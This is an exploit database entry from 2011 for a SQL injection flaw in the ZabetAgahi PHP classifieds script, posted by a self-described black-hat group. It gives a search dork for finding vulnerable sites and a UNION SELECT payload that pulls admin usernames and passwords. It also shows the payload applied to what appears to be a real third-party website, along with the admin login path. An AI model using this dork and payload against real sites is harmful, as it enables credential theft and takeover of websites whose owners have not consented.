ZabetAgahi SQL Injection Vulnerability

2011-05-21T00:00:00
ID 1337DAY-ID-16146
Type zdt
Reporter 3H34N
Modified 2011-05-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #(+) Exploit Title: ZabetAgahi SQLInjection Vulnerability
#(+) Author       : 3H34N
#(+) E-mail       : [email protected]
#(+) dork         : inurl:ZabetAgahiCategory.php?cid=
#(+) Versian      : Gold Ver & Othder
#(+) Category     : Web Apps [SQl]
#(+) My Home 	  : http://Security-War.com and http://Black-HG.com
#(+) Platform     : Tested on: linux-Windows
#(+) Download     : http://www.zabet.ir/
 
____________________________________________________________________
____________________________________________________________________
 
 
The security problem in the file "ZabetAgahiCategory.php" has been created.
 
[~] Vulnerable File :
 
#      [+]http://localhost.com/ZabetAgahiCategory.php?cid=[SQL]

#      [+]-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--

:

 
#      [+]http://www.alborz137.ir/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--
 
     
 
Note:login page is here http://localhost.com//AdminZabetAgahi/AdminZabetAgahiHome.php
____________________________________________________________________
____________________________________________________________________
 
########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~  S3Ri0uS and all Friends
(+)Gr33ts to : All Iranian HackerZ
######################################################################## 



#  0day.today [2018-01-02]  #